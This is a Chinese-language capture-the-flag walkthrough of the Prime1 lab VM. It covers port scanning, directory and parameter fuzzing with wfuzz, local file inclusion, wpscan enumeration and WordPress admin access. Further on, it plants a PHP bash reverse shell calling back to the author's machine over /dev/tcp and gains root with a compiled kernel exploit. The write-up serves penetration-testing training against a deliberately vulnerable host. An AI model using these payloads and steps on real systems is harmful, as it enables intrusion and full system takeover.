首页 > 其他分享 >Prime1 - 信息收集和分析能力的试炼

Prime1 - 信息收集和分析能力的试炼

时间:2024-06-01 21:21:26浏览次数:20  
标签:试炼 txt 收集 -- share wfuzz Prime1 php usr

微信公众号

主机发现

image-20240601141534240

nmap扫描与分析

端口22、80

image-20240601141745671

详细扫描;linux、ubuntu、

image-20240601141757418

udp扫描

端口都是关闭的

image-20240601142001800

脚本扫描

image-20240601142754347

web渗透

打开只有一张图片;源码有图片和一个alt:hnp security不知道有啥用,先记录下来吧

image-20240601142306031

继续web渗透思路走吧,目录爆破

关于工具有很多,差别不大,主要是会工具的指定参数

man dirb看一下工具使用参数

image-20240601142841104

dirb也会对二级目录进行扫描

dev不算一个常规目录;index.php、wordpress

image-20240601143017782

说我们正在0级别,在真实渗透测试中,我们应该用我们的工具深度挖掘web,祝我们快了;意义不大

image-20240601143417567

那是不是dirb一级目录扫描意义,我们进入深度扫描,-X指定参数,一般有.zip、.txt;php感觉暂时不用添加吧,因为他这个是worepress网站

secret.txt

image-20240601144549195

curl看一下吧

fuzz模糊测试意思,每一个php页面,得到正确参数,如果仍然被卡住,OSCP

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

image-20240601144736073

github网站貌似就是一个模糊测试

给的有

COMMNAD = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something

COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something

COMMAND ==> wfuzz -c -w /usr/share/seclists//usr/share/seclists/Discovery/DNS --hc 404 --hw 617 -u website.com -H "HOST: FUZZ.website.com"

COMMAND ==> wfuzz -c -w /usr/share/seclists//usr/share/seclists/Discovery/DNS --hc 404 --hw 7873 -u hnpsec.com -H "HOST: FUZZ.hnpsec.com"

image-20240601145135745

那我们再指定.php扫

image-20240601145110204

两个php网站打开都是开头的图片,按照提示意思应该是wfuzz对php进行模糊测试

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 http://192.168.218.159/image.php?FUZZ=something
  • -c 高亮显示颜色
  • -w指定字典
  • something无所谓,用啥都行

晒选隐藏的404;在正常思路中wfuzz都先不加指定404的,我们先去掉测试一下

多次出现的147 12w应该都是没有意义的

image-20240601150405656

我们可以把它隐藏掉,

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hh 147  http://192.168.218.159/image.php?FUZZ=something

image-20240601150732477

没东西,那换另一个文件去扫描

嗯,这有file文件

image-20240601151131349

去看一下,说做得不错,正在挖掘错误的文件

打个靶机还被入坑嘲讽了,那思路就是错了,

再看一下目前有的信息再利用吧

image-20240601151334696

image-20240601151655271

直接网站访问location是不行的,file会不会文件包含漏洞啥的,往后指定下=location.txt

错误连接,我又扫了一下80关闭了,是靶机自带的坑?还是我的靶机不太稳定,又重启了一遍

提示说secrettier360参数在其他php页面

image-20240601153437309

问题是secrettier360后跟啥东西,尝试无后缀,location.txt等等;还是不行,换个php文件

文件包含漏洞

这个就可以了、说得到了正确参数,暂时迷住了,没啥思路

image-20240601154043238

找到了正确的位置,也没啥其他提示了,这个文件利用也挺多的,尝试文件包含漏洞,嗯,一把成

收集下bash环境的用户

victor、root

image-20240601154443868

又没啥东西了,观察了半天/etc/passwd下还有提示,

find password.txt file in my directory:/home/saket:

在我的目录中找到password.txt文件:/home/saket:

image-20240601154838527

再用漏洞访问一下,嗯可以,说又是正确参数,follow_the_ippsec

image-20240601155117012

尝试作为ssh密码,尝试后都错误了,忘记wordpress了

针对cms的扫描;大部分用的是wpscan

wpscan --url 192.168.218.159/wordpress -e u

-u是刚才有了follow_the_ippsec我们现在看他有哪些用户;很熟悉,

image-20240601195829946

获得wordpress后台权限

登录victor,成功

image-20240601195858402

因为wordpress做的很多,通常都是插件或者主题里进行文件上传

获取初始系统shell

他说我们需要使这个文件可写;那我们就去寻找嘛

image-20240601201251847

找到这我们思路就是写php反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.218.145/445 0>&1'");?>

image-20240601201428973

之后就是执行这个页面,找一下这个路径

/wordpress/wp-content/themes/twentynineteen/secret.php

同时看kali也反应了

image-20240601204337380

照常sudo -l

image-20240601204517716

看一下各类信息啥的

image-20240601204816293

image-20240601205024867

可以看passwd不能看shadow;简单尝试的已经尝试了

系统内核漏洞提权

uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

searchsploit搜一下内核能不能利用

第一个不是提权;简单试一下第二个;先把文件下载到本地

image-20240601205318845

image-20240601205612269

我们要养成一个逻辑,拿到一个文件我们要简单读一读,知道是啥样的

编译这点要说一下,如果kali版本过高gcc编译是不一样的,可能无法利用,尽量在靶机里编译

建立php服务器传输;利用文件一般在tmp进行传输利用

或者python都可以;这里我用的python

python -m http.server 888

将已经编译好的和未编译的都传过来

image-20240601210526915

加上x执行权限;执行;意料之中,不行,我的本地kali版本太高了

image-20240601210648686

使用靶机的gcc尝试一下;这样应该是成了,

image-20240601210831476

使用python交互式解决下交互式的问题

python -c 'import pty;pty.spawn("/bin/bash")'

这个靶机目前就已经拉满了

image-20240601211001156

标签:试炼,txt,收集,--,share,wfuzz,Prime1,php,usr
From: https://www.cnblogs.com/guangen/p/18226422

相关文章

  • 高效日志管理:通过 Systemd Journal 收集日志的终极指南
    随着systemd成了主流的init系统,systemd的功能也在不断的增加,比如对系统日志的管理。Systemd设计的日志系统好处多多,这里笔者就不再赘述了,本文笔者主要介绍systemdjournal收集日志的三种方式:程序使用libc库中的syslog()函数输出的日志使用printf()函数打印的......
  • 渗透测试之信息收集篇
    前言信息收集的重要性进行渗透测试之前,最重要的一步就是信息收集。信息收集可以让渗透者选择合适和准确的渗透测试攻击方式,缩短渗透测试时间。所谓知己知彼,百战不殆,我们越了解测试目标,测试的工作就越容易。最后能否成功渗透进入目标,很大程度上取决于信息搜集。 ......
  • oracle自动统计收集
    环境:oracle19C1、自动统计收集的计划窗口信息colREPEAT_INTERVALfora60colDURATIONfora20SELECTw.window_name,w.repeat_interval,w.duration,w.enabledFROMdba_autotask_window_clientsc,dba_scheduler_windowswWHEREc.window_name=w.window_nameANDc.opt......
  • ChatGPT4的科研应用:从数据收集到论文发表的全流程
    2022年11月30日,可能将成为一个改变人类历史的日子——美国人工智能开发机构OpenAI推出了聊天机器人ChatGPT3.5,将人工智能的发展推向了一个新的高度。2023年4月,更强版本的ChatGPT4.0上线,文本、语音、图像等多模态交互方式使其在各行各业的应用呈现了更多的可能性。2023年11月......
  • JVM 垃圾收集器分类
    参考官网https://docs.oracle.com/en/java/javase/17/gctuning/introduction-garbage-collection-tuning.html。垃圾收集器可以分为以下四类:1、Serial收集器这个收集器是一个单线程工作的收集器,但它的“单线程”的意义并不仅仅是说......
  • Java垃圾收集
    在java中,垃圾意味着未引用的对象。垃圾收集是自动回收运行时未使用内存的过程。换句话说,它是一种销毁未使用对象的方法。它类似于,在C语言中使用free()函数,在C++中使用delete()。但是,在java中这些会自动执行。因此,java提供了更好的内存管理。垃圾收集的好处它使java内存有......
  • 【子域收集】OneForAll v0.4.5
    #简介OneForAll是一款功能强大的子域收集工具,该工具解决了同类工具不够强大、不够友好、效率问题等痛点,从而打造了一款简单易用强大的子域名收集工具。#软件截图#工具使用快速使用查看命令帮助python3oneforall.py-h对example.com域名进行子域名挖掘python3one......
  • 内网渗透-信息收集-精简详细篇
    一、前言上一篇我们已经讲了在Windows主机里面信息探测的一些命令,但是有很多很杂,这里就把最常用的列在这里就行。二、本机基础信息收集1.查看当前用户、权限。whoami/all2.查看网络配置`ipconfig/all`3.查看主机路由信息routeprint4.查看操作系统信息systeminfo5.......
  • 内网渗透-信息收集
    一、前言对于所有的渗透而言,信息收集是最重要的一步,关系着后续的所有进程。对于内网渗透来说,信息收集主要就是对所拿下的一台主机进行信息探索。这里主要介绍一些常用的命令。二、获得主机的基本信息1.获取主机名hostname{%asset_img1.png%}2.获取系统信息systeminfo3.查......
  • Vue3源码解析--收集的依赖是什么?怎么收集的?什么时候收集的?
    从Vue开始较大范围在前端应用开始,关于Vue一些基础知识的讨论和面试问题就在开发圈子里基本上就跟前几年的股票和基金一样,楼下摆摊卖酱香饼的阿姨都能说上几句那种。找过前端开发工作或者正在找开发工作的前端都知道,面试官基本上都有那么几个常问的问题,而网上呢也有那么一套可以用......